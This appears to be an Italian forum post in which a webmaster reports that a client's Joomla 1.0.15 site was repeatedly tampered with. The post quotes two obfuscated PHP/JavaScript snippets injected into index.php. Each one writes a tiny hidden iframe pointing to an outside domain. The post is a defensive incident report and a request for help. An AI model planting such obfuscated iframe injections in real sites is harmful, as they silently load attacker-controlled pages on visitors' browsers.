Ciao a tutti,
scrivo per segnalare un probabile tentativo di violazione del sito di un mio cliente con Joomla! 1.0.15.
Da due giorni a questa parte, tra le 23.30 e l'una di notte, qualcuno modifica con successo index.php inserendo rispettivamente nei due casi:
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
mentre questa notte è stato inserito, sempre alla fine della pagina:
<?php echo '<script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>'; ?>
Il dominio è registrato presso A ruba e a causa di questo ho PHP register globals impostato su ON.
Infine, questa mattina, collegandomi al pannello di amministrazione del sito, ho notato che l'impostazione EMULAZIONE REGISTER GLOBALS era su ON, anziche su OFF.
Provvedo subito a cambiare tutte le pwl compreso FTP.
Vi ringrazio in anticipo qualora riusciste a darmi qualche feedback.
Alessandro
